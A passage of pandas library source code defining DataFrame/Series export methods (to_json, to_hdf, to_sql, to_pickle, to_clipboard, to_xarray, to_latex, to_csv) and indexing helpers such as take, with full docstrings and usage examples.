float_format=float_format,
index=index,
index_label=index_label,
merge_cells=merge_cells,
inf_rep=inf_rep,
)
formatter.write(
excel_writer,
sheet_name=sheet_name,
startrow=startrow,
startcol=startcol,
freeze_panes=freeze_panes,
engine=engine,
)
def to_json(
self,
path_or_buf: Optional[FilePathOrBuffer] = None,
orient: Optional[str] = None,
date_format: Optional[str] = None,
double_precision: int = 10,
force_ascii: bool_t = True,
date_unit: str = "ms",
default_handler: Optional[Callable[[Any], JSONSerializable]] = None,
lines: bool_t = False,
compression: Optional[str] = "infer",
index: bool_t = True,
indent: Optional[int] = None,
) -> Optional[str]:
"""
Convert the object to a JSON string.
Note NaN's and None will be converted to null and datetime objects
will be converted to UNIX timestamps.
Parameters
----------
path_or_buf : str or file handle, optional
File path or object. If not specified, the result is returned as
a string.
orient : str
Indication of expected JSON string format.
* Series:
- default is 'index'
- allowed values are: {'split','records','index','table'}.
* DataFrame:
- default is 'columns'
- allowed values are: {'split', 'records', 'index', 'columns',
'values', 'table'}.
* The format of the JSON string:
- 'split' : dict like {'index' -> [index], 'columns' -> [columns],
'data' -> [values]}
- 'records' : list like [{column -> value}, ... , {column -> value}]
- 'index' : dict like {index -> {column -> value}}
- 'columns' : dict like {column -> {index -> value}}
- 'values' : just the values array
- 'table' : dict like {'schema': {schema}, 'data': {data}}
Describing the data, where data component is like ``orient='records'``.
.. versionchanged:: 0.20.0
date_format : {None, 'epoch', 'iso'}
Type of date conversion. 'epoch' = epoch milliseconds,
'iso' = ISO8601. The default depends on the `orient`. For
``orient='table'``, the default is 'iso'. For all other orients,
the default is 'epoch'.
double_precision : int, default 10
The number of decimal places to use when encoding
floating point values.
force_ascii : bool, default True
Force encoded string to be ASCII.
date_unit : str, default 'ms' (milliseconds)
The time unit to encode to, governs timestamp and ISO8601
precision. One of 's', 'ms', 'us', 'ns' for second, millisecond,
microsecond, and nanosecond respectively.
default_handler : callable, default None
Handler to call if object cannot otherwise be converted to a
suitable format for JSON. Should receive a single argument which is
the object to convert and return a serialisable object.
lines : bool, default False
If 'orient' is 'records' write out line delimited json format. Will
throw ValueError if incorrect 'orient' since others are not list
like.
compression : {'infer', 'gzip', 'bz2', 'zip', 'xz', None}
A string representing the compression to use in the output file,
only used when the first argument is a filename. By default, the
compression is inferred from the filename.
.. versionadded:: 0.21.0
.. versionchanged:: 0.24.0
'infer' option added and set to default
index : bool, default True
Whether to include the index values in the JSON string. Not
including the index (``index=False``) is only supported when
orient is 'split' or 'table'.
.. versionadded:: 0.23.0
indent : int, optional
Length of whitespace used to indent each record.
.. versionadded:: 1.0.0
Returns
-------
None or str
If path_or_buf is None, returns the resulting json format as a
string. Otherwise returns None.
See Also
--------
read_json : Convert a JSON string to pandas object.
Notes
-----
The behavior of ``indent=0`` varies from the stdlib, which does not
indent the output but does insert newlines. Currently, ``indent=0``
and the default ``indent=None`` are equivalent in pandas, though this
may change in a future release.
Examples
--------
>>> df = pd.DataFrame([['a', 'b'], ['c', 'd']],
... index=['row 1', 'row 2'],
... columns=['col 1', 'col 2'])
>>> df.to_json(orient='split')
'{"columns":["col 1","col 2"],
"index":["row 1","row 2"],
"data":[["a","b"],["c","d"]]}'
Encoding/decoding a Dataframe using ``'records'`` formatted JSON.
Note that index labels are not preserved with this encoding.
>>> df.to_json(orient='records')
'[{"col 1":"a","col 2":"b"},{"col 1":"c","col 2":"d"}]'
Encoding/decoding a Dataframe using ``'index'`` formatted JSON:
>>> df.to_json(orient='index')
'{"row 1":{"col 1":"a","col 2":"b"},"row 2":{"col 1":"c","col 2":"d"}}'
Encoding/decoding a Dataframe using ``'columns'`` formatted JSON:
>>> df.to_json(orient='columns')
'{"col 1":{"row 1":"a","row 2":"c"},"col 2":{"row 1":"b","row 2":"d"}}'
Encoding/decoding a Dataframe using ``'values'`` formatted JSON:
>>> df.to_json(orient='values')
'[["a","b"],["c","d"]]'
Encoding with Table Schema
>>> df.to_json(orient='table')
'{"schema": {"fields": [{"name": "index", "type": "string"},
{"name": "col 1", "type": "string"},
{"name": "col 2", "type": "string"}],
"primaryKey": "index",
"pandas_version": "0.20.0"},
"data": [{"index": "row 1", "col 1": "a", "col 2": "b"},
{"index": "row 2", "col 1": "c", "col 2": "d"}]}'
"""
from pandas.io import json
if date_format is None and orient == "table":
date_format = "iso"
elif date_format is None:
date_format = "epoch"
config.is_nonnegative_int(indent)
indent = indent or 0
return json.to_json(
path_or_buf=path_or_buf,
obj=self,
orient=orient,
date_format=date_format,
double_precision=double_precision,
force_ascii=force_ascii,
date_unit=date_unit,
default_handler=default_handler,
lines=lines,
compression=compression,
index=index,
indent=indent,
)
def to_hdf(
self,
path_or_buf,
key: str,
mode: str = "a",
complevel: Optional[int] = None,
complib: Optional[str] = None,
append: bool_t = False,
format: Optional[str] = None,
index: bool_t = True,
min_itemsize: Optional[Union[int, Dict[str, int]]] = None,
nan_rep=None,
dropna: Optional[bool_t] = None,
data_columns: Optional[List[str]] = None,
errors: str = "strict",
encoding: str = "UTF-8",
) -> None:
"""
Write the contained data to an HDF5 file using HDFStore.
Hierarchical Data Format (HDF) is self-describing, allowing an
application to interpret the structure and contents of a file with
no outside information. One HDF file can hold a mix of related objects
which can be accessed as a group or as individual objects.
In order to add another DataFrame or Series to an existing HDF file
please use append mode and a different a key.
For more information see the :ref:`user guide <io.hdf5>`.
Parameters
----------
path_or_buf : str or pandas.HDFStore
File path or HDFStore object.
key : str
Identifier for the group in the store.
mode : {'a', 'w', 'r+'}, default 'a'
Mode to open file:
- 'w': write, a new file is created (an existing file with
the same name would be deleted).
- 'a': append, an existing file is opened for reading and
writing, and if the file does not exist it is created.
- 'r+': similar to 'a', but the file must already exist.
complevel : {0-9}, optional
Specifies a compression level for data.
A value of 0 disables compression.
complib : {'zlib', 'lzo', 'bzip2', 'blosc'}, default 'zlib'
Specifies the compression library to be used.
As of v0.20.2 these additional compressors for Blosc are supported
(default if no compressor specified: 'blosc:blosclz'):
{'blosc:blosclz', 'blosc:lz4', 'blosc:lz4hc', 'blosc:snappy',
'blosc:zlib', 'blosc:zstd'}.
Specifying a compression library which is not available issues
a ValueError.
append : bool, default False
For Table formats, append the input data to the existing.
format : {'fixed', 'table', None}, default 'fixed'
Possible values:
- 'fixed': Fixed format. Fast writing/reading. Not-appendable,
nor searchable.
- 'table': Table format. Write as a PyTables Table structure
which may perform worse but allow more flexible operations
like searching / selecting subsets of the data.
- If None, pd.get_option('io.hdf.default_format') is checked,
followed by fallback to "fixed"
errors : str, default 'strict'
Specifies how encoding and decoding errors are to be handled.
See the errors argument for :func:`open` for a full list
of options.
encoding : str, default "UTF-8"
min_itemsize : dict or int, optional
Map column names to minimum string sizes for columns.
nan_rep : Any, optional
How to represent null values as str.
Not allowed with append=True.
data_columns : list of columns or True, optional
List of columns to create as indexed data columns for on-disk
queries, or True to use all columns. By default only the axes
of the object are indexed. See :ref:`io.hdf5-query-data-columns`.
Applicable only to format='table'.
See Also
--------
DataFrame.read_hdf : Read from HDF file.
DataFrame.to_parquet : Write a DataFrame to the binary parquet format.
DataFrame.to_sql : Write to a sql table.
DataFrame.to_feather : Write out feather-format for DataFrames.
DataFrame.to_csv : Write out to a csv file.
Examples
--------
>>> df = pd.DataFrame({'A': [1, 2, 3], 'B': [4, 5, 6]},
... index=['a', 'b', 'c'])
>>> df.to_hdf('data.h5', key='df', mode='w')
We can add another object to the same file:
>>> s = pd.Series([1, 2, 3, 4])
>>> s.to_hdf('data.h5', key='s')
Reading from HDF file:
>>> pd.read_hdf('data.h5', 'df')
A B
a 1 4
b 2 5
c 3 6
>>> pd.read_hdf('data.h5', 's')
0 1
1 2
2 3
3 4
dtype: int64
Deleting file with data:
>>> import os
>>> os.remove('data.h5')
"""
from pandas.io import pytables
pytables.to_hdf(
path_or_buf,
key,
self,
mode=mode,
complevel=complevel,
complib=complib,
append=append,
format=format,
index=index,
min_itemsize=min_itemsize,
nan_rep=nan_rep,
dropna=dropna,
data_columns=data_columns,
errors=errors,
encoding=encoding,
)
def to_sql(
self,
name: str,
con,
schema=None,
if_exists: str = "fail",
index: bool_t = True,
index_label=None,
chunksize=None,
dtype=None,
method=None,
) -> None:
"""
Write records stored in a DataFrame to a SQL database.
Databases supported by SQLAlchemy [1]_ are supported. Tables can be
newly created, appended to, or overwritten.
Parameters
----------
name : str
Name of SQL table.
con : sqlalchemy.engine.Engine or sqlite3.Connection
Using SQLAlchemy makes it possible to use any DB supported by that
library. Legacy support is provided for sqlite3.Connection objects. The user
is responsible for engine disposal and connection closure for the SQLAlchemy
connectable See `here \
<https://docs.sqlalchemy.org/en/13/core/connections.html>`_.
schema : str, optional
Specify the schema (if database flavor supports this). If None, use
default schema.
if_exists : {'fail', 'replace', 'append'}, default 'fail'
How to behave if the table already exists.
* fail: Raise a ValueError.
* replace: Drop the table before inserting new values.
* append: Insert new values to the existing table.
index : bool, default True
Write DataFrame index as a column. Uses `index_label` as the column
name in the table.
index_label : str or sequence, default None
Column label for index column(s). If None is given (default) and
`index` is True, then the index names are used.
A sequence should be given if the DataFrame uses MultiIndex.
chunksize : int, optional
Specify the number of rows in each batch to be written at a time.
By default, all rows will be written at once.
dtype : dict or scalar, optional
Specifying the datatype for columns. If a dictionary is used, the
keys should be the column names and the values should be the
SQLAlchemy types or strings for the sqlite3 legacy mode. If a
scalar is provided, it will be applied to all columns.
method : {None, 'multi', callable}, optional
Controls the SQL insertion clause used:
* None : Uses standard SQL ``INSERT`` clause (one per row).
* 'multi': Pass multiple values in a single ``INSERT`` clause.
* callable with signature ``(pd_table, conn, keys, data_iter)``.
Details and a sample callable implementation can be found in the
section :ref:`insert method <io.sql.method>`.
.. versionadded:: 0.24.0
Raises
------
ValueError
When the table already exists and `if_exists` is 'fail' (the
default).
See Also
--------
read_sql : Read a DataFrame from a table.
Notes
-----
Timezone aware datetime columns will be written as
``Timestamp with timezone`` type with SQLAlchemy if supported by the
database. Otherwise, the datetimes will be stored as timezone unaware
timestamps local to the original timezone.
.. versionadded:: 0.24.0
References
----------
.. [1] https://docs.sqlalchemy.org
.. [2] https://www.python.org/dev/peps/pep-0249/
Examples
--------
Create an in-memory SQLite database.
>>> from sqlalchemy import create_engine
>>> engine = create_engine('sqlite://', echo=False)
Create a table from scratch with 3 rows.
>>> df = pd.DataFrame({'name' : ['User 1', 'User 2', 'User 3']})
>>> df
name
0 User 1
1 User 2
2 User 3
>>> df.to_sql('users', con=engine)
>>> engine.execute("SELECT * FROM users").fetchall()
[(0, 'User 1'), (1, 'User 2'), (2, 'User 3')]
>>> df1 = pd.DataFrame({'name' : ['User 4', 'User 5']})
>>> df1.to_sql('users', con=engine, if_exists='append')
>>> engine.execute("SELECT * FROM users").fetchall()
[(0, 'User 1'), (1, 'User 2'), (2, 'User 3'),
(0, 'User 4'), (1, 'User 5')]
Overwrite the table with just ``df1``.
>>> df1.to_sql('users', con=engine, if_exists='replace',
... index_label='id')
>>> engine.execute("SELECT * FROM users").fetchall()
[(0, 'User 4'), (1, 'User 5')]
Specify the dtype (especially useful for integers with missing values).
Notice that while pandas is forced to store the data as floating point,
the database supports nullable integers. When fetching the data with
Python, we get back integer scalars.
>>> df = pd.DataFrame({"A": [1, None, 2]})
>>> df
A
0 1.0
1 NaN
2 2.0
>>> from sqlalchemy.types import Integer
>>> df.to_sql('integers', con=engine, index=False,
... dtype={"A": Integer()})
>>> engine.execute("SELECT * FROM integers").fetchall()
[(1,), (None,), (2,)]
"""
from pandas.io import sql
sql.to_sql(
self,
name,
con,
schema=schema,
if_exists=if_exists,
index=index,
index_label=index_label,
chunksize=chunksize,
dtype=dtype,
method=method,
)
def to_pickle(
self,
path,
compression: Optional[str] = "infer",
protocol: int = pickle.HIGHEST_PROTOCOL,
) -> None:
"""
Pickle (serialize) object to file.
Parameters
----------
path : str
File path where the pickled object will be stored.
compression : {'infer', 'gzip', 'bz2', 'zip', 'xz', None}, \
default 'infer'
A string representing the compression to use in the output file. By
default, infers from the file extension in specified path.
protocol : int
Int which indicates which protocol should be used by the pickler,
default HIGHEST_PROTOCOL (see [1]_ paragraph 12.1.2). The possible
values are 0, 1, 2, 3, 4. A negative value for the protocol
parameter is equivalent to setting its value to HIGHEST_PROTOCOL.
.. [1] https://docs.python.org/3/library/pickle.html.
.. versionadded:: 0.21.0.
See Also
--------
read_pickle : Load pickled pandas object (or any object) from file.
DataFrame.to_hdf : Write DataFrame to an HDF5 file.
DataFrame.to_sql : Write DataFrame to a SQL database.
DataFrame.to_parquet : Write a DataFrame to the binary parquet format.
Examples
--------
>>> original_df = pd.DataFrame({"foo": range(5), "bar": range(5, 10)})
>>> original_df
foo bar
0 0 5
1 1 6
2 2 7
3 3 8
4 4 9
>>> original_df.to_pickle("./dummy.pkl")
>>> unpickled_df = pd.read_pickle("./dummy.pkl")
>>> unpickled_df
foo bar
0 0 5
1 1 6
2 2 7
3 3 8
4 4 9
>>> import os
>>> os.remove("./dummy.pkl")
"""
from pandas.io.pickle import to_pickle
to_pickle(self, path, compression=compression, protocol=protocol)
def to_clipboard(
self, excel: bool_t = True, sep: Optional[str] = None, **kwargs
) -> None:
r"""
Copy object to the system clipboard.
Write a text representation of object to the system clipboard.
This can be pasted into Excel, for example.
Parameters
----------
excel : bool, default True
Produce output in a csv format for easy pasting into excel.
- True, use the provided separator for csv pasting.
- False, write a string representation of the object to the clipboard.
sep : str, default ``'\t'``
Field delimiter.
**kwargs
These parameters will be passed to DataFrame.to_csv.
See Also
--------
DataFrame.to_csv : Write a DataFrame to a comma-separated values
(csv) file.
read_clipboard : Read text from clipboard and pass to read_table.
Notes
-----
Requirements for your platform.
- Linux : `xclip`, or `xsel` (with `PyQt4` modules)
- Windows : none
- OS X : none
Examples
--------
Copy the contents of a DataFrame to the clipboard.
>>> df = pd.DataFrame([[1, 2, 3], [4, 5, 6]], columns=['A', 'B', 'C'])
>>> df.to_clipboard(sep=',')
... # Wrote the following to the system clipboard:
... # ,A,B,C
... # 0,1,2,3
... # 1,4,5,6
We can omit the index by passing the keyword `index` and setting
it to false.
>>> df.to_clipboard(sep=',', index=False)
... # Wrote the following to the system clipboard:
... # A,B,C
... # 1,2,3
... # 4,5,6
"""
from pandas.io import clipboards
clipboards.to_clipboard(self, excel=excel, sep=sep, **kwargs)
def to_xarray(self):
"""
Return an xarray object from the pandas object.
Returns
-------
xarray.DataArray or xarray.Dataset
Data in the pandas structure converted to Dataset if the object is
a DataFrame, or a DataArray if the object is a Series.
See Also
--------
DataFrame.to_hdf : Write DataFrame to an HDF5 file.
DataFrame.to_parquet : Write a DataFrame to the binary parquet format.
Notes
-----
See the `xarray docs <https://xarray.pydata.org/en/stable/>`__
Examples
--------
>>> df = pd.DataFrame([('falcon', 'bird', 389.0, 2),
... ('parrot', 'bird', 24.0, 2),
... ('lion', 'mammal', 80.5, 4),
... ('monkey', 'mammal', np.nan, 4)],
... columns=['name', 'class', 'max_speed',
... 'num_legs'])
>>> df
name class max_speed num_legs
0 falcon bird 389.0 2
1 parrot bird 24.0 2
2 lion mammal 80.5 4
3 monkey mammal NaN 4
>>> df.to_xarray()
<xarray.Dataset>
Dimensions: (index: 4)
Coordinates:
* index (index) int64 0 1 2 3
Data variables:
name (index) object 'falcon' 'parrot' 'lion' 'monkey'
class (index) object 'bird' 'bird' 'mammal' 'mammal'
max_speed (index) float64 389.0 24.0 80.5 nan
num_legs (index) int64 2 2 4 4
>>> df['max_speed'].to_xarray()
<xarray.DataArray 'max_speed' (index: 4)>
array([389. , 24. , 80.5, nan])
Coordinates:
* index (index) int64 0 1 2 3
>>> dates = pd.to_datetime(['2018-01-01', '2018-01-01',
... '2018-01-02', '2018-01-02'])
>>> df_multiindex = pd.DataFrame({'date': dates,
... 'animal': ['falcon', 'parrot',
... 'falcon', 'parrot'],
... 'speed': [350, 18, 361, 15]})
>>> df_multiindex = df_multiindex.set_index(['date', 'animal'])
>>> df_multiindex
speed
date animal
2018-01-01 falcon 350
parrot 18
2018-01-02 falcon 361
parrot 15
>>> df_multiindex.to_xarray()
<xarray.Dataset>
Dimensions: (animal: 2, date: 2)
Coordinates:
* date (date) datetime64[ns] 2018-01-01 2018-01-02
* animal (animal) object 'falcon' 'parrot'
Data variables:
speed (date, animal) int64 350 18 361 15
"""
xarray = import_optional_dependency("xarray")
if self.ndim == 1:
return xarray.DataArray.from_series(self)
else:
return xarray.Dataset.from_dataframe(self)
@Substitution(returns=fmt.return_docstring)
def to_latex(
self,
buf=None,
columns=None,
col_space=None,
header=True,
index=True,
na_rep="NaN",
formatters=None,
float_format=None,
sparsify=None,
index_names=True,
bold_rows=False,
column_format=None,
longtable=None,
escape=None,
encoding=None,
decimal=".",
multicolumn=None,
multicolumn_format=None,
multirow=None,
caption=None,
label=None,
):
r"""
Render object to a LaTeX tabular, longtable, or nested table/tabular.
Requires ``\usepackage{booktabs}``. The output can be copy/pasted
into a main LaTeX document or read from an external file
with ``\input{table.tex}``.
.. versionchanged:: 0.20.2
Added to Series.
.. versionchanged:: 1.0.0
Added caption and label arguments.
Parameters
----------
buf : str, Path or StringIO-like, optional, default None
Buffer to write to. If None, the output is returned as a string.
columns : list of label, optional
The subset of columns to write. Writes all columns by default.
col_space : int, optional
The minimum width of each column.
header : bool or list of str, default True
Write out the column names. If a list of strings is given,
it is assumed to be aliases for the column names.
index : bool, default True
Write row names (index).
na_rep : str, default 'NaN'
Missing data representation.
formatters : list of functions or dict of {str: function}, optional
Formatter functions to apply to columns' elements by position or
name. The result of each function must be a unicode string.
List must be of length equal to the number of columns.
float_format : one-parameter function or str, optional, default None
Formatter for floating point numbers. For example
``float_format="%%.2f"`` and ``float_format="{:0.2f}".format`` will
both result in 0.1234 being formatted as 0.12.
sparsify : bool, optional
Set to False for a DataFrame with a hierarchical index to print
every multiindex key at each row. By default, the value will be
read from the config module.
index_names : bool, default True
Prints the names of the indexes.
bold_rows : bool, default False
Make the row labels bold in the output.
column_format : str, optional
The columns format as specified in `LaTeX table format
<https://en.wikibooks.org/wiki/LaTeX/Tables>`__ e.g. 'rcl' for 3
columns. By default, 'l' will be used for all columns except
columns of numbers, which default to 'r'.
longtable : bool, optional
By default, the value will be read from the pandas config
module. Use a longtable environment instead of tabular. Requires
adding a \usepackage{longtable} to your LaTeX preamble.
escape : bool, optional
By default, the value will be read from the pandas config
module. When set to False prevents from escaping latex special
characters in column names.
encoding : str, optional
A string representing the encoding to use in the output file,
defaults to 'utf-8'.
decimal : str, default '.'
Character recognized as decimal separator, e.g. ',' in Europe.
multicolumn : bool, default True
Use \multicolumn to enhance MultiIndex columns.
The default will be read from the config module.
multicolumn_format : str, default 'l'
The alignment for multicolumns, similar to `column_format`
The default will be read from the config module.
multirow : bool, default False
Use \multirow to enhance MultiIndex rows. Requires adding a
\usepackage{multirow} to your LaTeX preamble. Will print
centered labels (instead of top-aligned) across the contained
rows, separating groups via clines. The default will be read
from the pandas config module.
caption : str, optional
The LaTeX caption to be placed inside ``\caption{}`` in the output.
.. versionadded:: 1.0.0
label : str, optional
The LaTeX label to be placed inside ``\label{}`` in the output.
This is used with ``\ref{}`` in the main ``.tex`` file.
.. versionadded:: 1.0.0
%(returns)s
See Also
--------
DataFrame.to_string : Render a DataFrame to a console-friendly
tabular output.
DataFrame.to_html : Render a DataFrame as an HTML table.
Examples
--------
>>> df = pd.DataFrame({'name': ['Raphael', 'Donatello'],
... 'mask': ['red', 'purple'],
... 'weapon': ['sai', 'bo staff']})
>>> print(df.to_latex(index=False)) # doctest: +NORMALIZE_WHITESPACE
\begin{tabular}{lll}
\toprule
name & mask & weapon \\
\midrule
Raphael & red & sai \\
Donatello & purple & bo staff \\
\bottomrule
\end{tabular}
"""
# Get defaults from the pandas config
if self.ndim == 1:
self = self.to_frame()
if longtable is None:
longtable = config.get_option("display.latex.longtable")
if escape is None:
escape = config.get_option("display.latex.escape")
if multicolumn is None:
multicolumn = config.get_option("display.latex.multicolumn")
if multicolumn_format is None:
multicolumn_format = config.get_option("display.latex.multicolumn_format")
if multirow is None:
multirow = config.get_option("display.latex.multirow")
formatter = DataFrameFormatter(
self,
columns=columns,
col_space=col_space,
na_rep=na_rep,
header=header,
index=index,
formatters=formatters,
float_format=float_format,
bold_rows=bold_rows,
sparsify=sparsify,
index_names=index_names,
escape=escape,
decimal=decimal,
)
return formatter.to_latex(
buf=buf,
column_format=column_format,
longtable=longtable,
encoding=encoding,
multicolumn=multicolumn,
multicolumn_format=multicolumn_format,
multirow=multirow,
caption=caption,
label=label,
)
def to_csv(
self,
path_or_buf: Optional[FilePathOrBuffer] = None,
sep: str = ",",
na_rep: str = "",
float_format: Optional[str] = None,
columns: Optional[Sequence[Label]] = None,
header: Union[bool_t, List[str]] = True,
index: bool_t = True,
index_label: Optional[Union[bool_t, str, Sequence[Label]]] = None,
mode: str = "w",
encoding: Optional[str] = None,
compression: Optional[Union[str, Mapping[str, str]]] = "infer",
quoting: Optional[int] = None,
quotechar: str = '"',
line_terminator: Optional[str] = None,
chunksize: Optional[int] = None,
date_format: Optional[str] = None,
doublequote: bool_t = True,
escapechar: Optional[str] = None,
decimal: Optional[str] = ".",
) -> Optional[str]:
r"""
Write object to a comma-separated values (csv) file.
.. versionchanged:: 0.24.0
The order of arguments for Series was changed.
Parameters
----------
path_or_buf : str or file handle, default None
File path or object, if None is provided the result is returned as
a string. If a file object is passed it should be opened with
`newline=''`, disabling universal newlines.
.. versionchanged:: 0.24.0
Was previously named "path" for Series.
sep : str, default ','
String of length 1. Field delimiter for the output file.
na_rep : str, default ''
Missing data representation.
float_format : str, default None
Format string for floating point numbers.
columns : sequence, optional
Columns to write.
header : bool or list of str, default True
Write out the column names. If a list of strings is given it is
assumed to be aliases for the column names.
.. versionchanged:: 0.24.0
Previously defaulted to False for Series.
index : bool, default True
Write row names (index).
index_label : str or sequence, or False, default None
Column label for index column(s) if desired. If None is given, and
`header` and `index` are True, then the index names are used. A
sequence should be given if the object uses MultiIndex. If
False do not print fields for index names. Use index_label=False
for easier importing in R.
mode : str
Python write mode, default 'w'.
encoding : str, optional
A string representing the encoding to use in the output file,
defaults to 'utf-8'.
compression : str or dict, default 'infer'
If str, represents compression mode. If dict, value at 'method' is
the compression mode. Compression mode may be any of the following
possible values: {'infer', 'gzip', 'bz2', 'zip', 'xz', None}. If
compression mode is 'infer' and `path_or_buf` is path-like, then
detect compression mode from the following extensions: '.gz',
'.bz2', '.zip' or '.xz'. (otherwise no compression). If dict given
and mode is 'zip' or inferred as 'zip', other entries passed as
additional compression options.
.. versionchanged:: 1.0.0
May now be a dict with key 'method' as compression mode
and other entries as additional compression options if
compression mode is 'zip'.
quoting : optional constant from csv module
Defaults to csv.QUOTE_MINIMAL. If you have set a `float_format`
then floats are converted to strings and thus csv.QUOTE_NONNUMERIC
will treat them as non-numeric.
quotechar : str, default '\"'
String of length 1. Character used to quote fields.
line_terminator : str, optional
The newline character or character sequence to use in the output
file. Defaults to `os.linesep`, which depends on the OS in which
this method is called ('\n' for linux, '\r\n' for Windows, i.e.).
.. versionchanged:: 0.24.0
chunksize : int or None
Rows to write at a time.
date_format : str, default None
Format string for datetime objects.
doublequote : bool, default True
Control quoting of `quotechar` inside a field.
escapechar : str, default None
String of length 1. Character used to escape `sep` and `quotechar`
when appropriate.
decimal : str, default '.'
Character recognized as decimal separator. E.g. use ',' for
European data.
Returns
-------
None or str
If path_or_buf is None, returns the resulting csv format as a
string. Otherwise returns None.
See Also
--------
read_csv : Load a CSV file into a DataFrame.
to_excel : Write DataFrame to an Excel file.
Examples
--------
>>> df = pd.DataFrame({'name': ['Raphael', 'Donatello'],
... 'mask': ['red', 'purple'],
... 'weapon': ['sai', 'bo staff']})
>>> df.to_csv(index=False)
'name,mask,weapon\nRaphael,red,sai\nDonatello,purple,bo staff\n'
Create 'out.zip' containing 'out.csv'
>>> compression_opts = dict(method='zip',
... archive_name='out.csv') # doctest: +SKIP
>>> df.to_csv('out.zip', index=False,
... compression=compression_opts) # doctest: +SKIP
"""
df = self if isinstance(self, ABCDataFrame) else self.to_frame()
from pandas.io.formats.csvs import CSVFormatter
formatter = CSVFormatter(
df,
path_or_buf,
line_terminator=line_terminator,
sep=sep,
encoding=encoding,
compression=compression,
quoting=quoting,
na_rep=na_rep,
float_format=float_format,
cols=columns,
header=header,
index=index,
index_label=index_label,
mode=mode,
chunksize=chunksize,
quotechar=quotechar,
date_format=date_format,
doublequote=doublequote,
escapechar=escapechar,
decimal=decimal,
)
formatter.save()
if path_or_buf is None:
return formatter.path_or_buf.getvalue()
return None
# ----------------------------------------------------------------------
# Lookup Caching
def _set_as_cached(self, item, cacher) -> None:
"""
Set the _cacher attribute on the calling object with a weakref to
cacher.
"""
self._cacher = (item, weakref.ref(cacher))
def _reset_cacher(self) -> None:
"""
Reset the cacher.
"""
if hasattr(self, "_cacher"):
del self._cacher
def _maybe_cache_changed(self, item, value) -> None:
"""
The object has called back to us saying maybe it has changed.
"""
self._data.set(item, value)
@property
def _is_cached(self) -> bool_t:
"""Return boolean indicating if self is cached or not."""
return getattr(self, "_cacher", None) is not None
def _get_cacher(self):
"""return my cacher or None"""
cacher = getattr(self, "_cacher", None)
if cacher is not None:
cacher = cacher[1]()
return cacher
def _maybe_update_cacher(
self, clear: bool_t = False, verify_is_copy: bool_t = True
) -> None:
"""
See if we need to update our parent cacher if clear, then clear our
cache.
Parameters
----------
clear : bool, default False
Clear the item cache.
verify_is_copy : bool, default True
Provide is_copy checks.
"""
cacher = getattr(self, "_cacher", None)
if cacher is not None:
ref = cacher[1]()
# we are trying to reference a dead referant, hence
# a copy
if ref is None:
del self._cacher
else:
# Note: we need to call ref._maybe_cache_changed even in the
# case where it will raise. (Uh, not clear why)
try:
ref._maybe_cache_changed(cacher[0], self)
except AssertionError:
# ref._data.setitem can raise
# AssertionError because of shape mismatch
pass
if verify_is_copy:
self._check_setitem_copy(stacklevel=5, t="referant")
if clear:
self._clear_item_cache()
def _clear_item_cache(self) -> None:
self._item_cache.clear()
# ----------------------------------------------------------------------
# Indexing Methods
def take(
self: FrameOrSeries, indices, axis=0, is_copy: Optional[bool_t] = None, **kwargs
) -> FrameOrSeries:
"""
Return the elements in the given *positional* indices along an axis.
This means that we are not indexing according to actual values in
the index attribute of the object. We are indexing according to the
actual position of the element in the object.
Parameters
----------
indices : array-like
An array of ints indicating which positions to take.
axis : {0 or 'index', 1 or 'columns', None}, default 0
The axis on which to select elements. ``0`` means that we are
selecting rows, ``1`` means that we are selecting columns.
is_copy : bool
Before pandas 1.0, ``is_copy=False`` can be specified to ensure
that the return value is an actual copy. Starting with pandas 1.0,
``take`` always returns a copy, and the keyword is therefore
deprecated.
.. deprecated:: 1.0.0
**kwargs
For compatibility with :meth:`numpy.take`. Has no effect on the
output.
Returns
-------
taken : same type as caller
An array-like containing the elements taken from the object.
See Also
--------
DataFrame.loc : Select a subset of a DataFrame by labels.
DataFrame.iloc : Select a subset of a DataFrame by positions.
numpy.take : Take elements from an array along an axis.
Examples
--------
>>> df = pd.DataFrame([('falcon', 'bird', 389.0),
... ('parrot', 'bird', 24.0),
... ('lion', 'mammal', 80.5),
... ('monkey', 'mammal', np.nan)],
... columns=['name', 'class', 'max_speed'],
... index=[0, 2, 3, 1])
>>> df
name class max_speed
0 falcon bird 389.0
2 parrot bird 24.0
3 lion mammal 80.5
1 monkey mammal NaN
Take elements at positions 0 and 3 along the axis 0 (default).
Note how the actual indices selected (0 and 1) do not correspond to
our selected indices 0 and 3. That's because we are selecting the 0th
and 3rd rows, not rows whose indices equal 0 and 3.
>>> df.take([0, 3])
name class max_speed
0 falcon bird 389.0
1 monkey mammal NaN
Take elements at indices 1 and 2 along the axis 1 (column selection).
>>> df.take([1, 2], axis=1)
class max_speed
0 bird 389.0
2 bird 24.0
3 mammal 80.5
1 mammal NaN
We may take elements using negative integers for positive indices,
starting from the end of the object, just like with Python lists.
>>> df.take([-1, -2])
name class max_speed
1 monkey mammal NaN
3 lion mammal 80.5
"""
if is_copy is not None:
warnings.warn(
"is_copy is deprecated and will be removed in a future version. "
"'take' always returns a copy, so there is no need to specify this.",
FutureWarning,
stacklevel=2,
)
nv.validate_take(tuple(), kwargs)
self._consolidate_inplace()
new_data = self._data.take(
indices, axis=self._get_block_manager_axis(axis), verify=True
)
return self._constructor(new_data).__finalize__(self)
def _take_with_is_copy(self: FrameOrSeries, indices, axis=0) -> FrameOrSeries:
"""
Internal version of the `take` method that sets the `_is_copy`
attribute to keep track of the parent dataframe (using in indexing
for the SettingWithCopyWarning).
See the docstring of `take` for full explanation of the parameters.
"""
result = self.take(indices=indices, axis=axis)
# Maybe set copy if we didn't actually change the index.
if not result._get_axis(axis).equals(self._get_axis(axis)):
result._set_is_copy(self)
return result
def xs(self, key, axis=0, level=None, drop_level: bool_t = True):
"""
Return cross-section from the Series/DataFrame.
This method takes a `key` argument to select data at a particular
level of a MultiIndex.
Parameters
----------
key : label or tuple of label
Label contained in the index, or partially in a MultiIndex.
axis : {0 or 'index', 1 or 'columns'}, default 0
Axis to retrieve cross-section on.
level : object, defaults to first n levels (n=1 or len(key))
In case of a key partially contained in a MultiIndex, indicate
which levels are used. Levels can be referred by label or position.
drop_level : bool, default True
If False, returns object with same levels as self.
Returns
-------
Series or DataFrame
Cross-section from the original Series or DataFrame
corresponding to the selected index levels.
See Also
--------
DataFrame.loc : Access a group of rows and columns
by label(s) or a boolean array.
DataFrame.iloc : Purely integer-location based indexing
for selection by position.
Notes
-----
`xs` can not be used to set values.
MultiIndex Slicers is a generic way to get/set values on
any level or levels.
It is a superset of `xs` functionality, see
:ref:`MultiIndex Slicers <advanced.mi_slicers>`.
Examples
--------
>>> d = {'num_legs': [4, 4, 2, 2],
... 'num_wings': [0, 0, 2, 2],
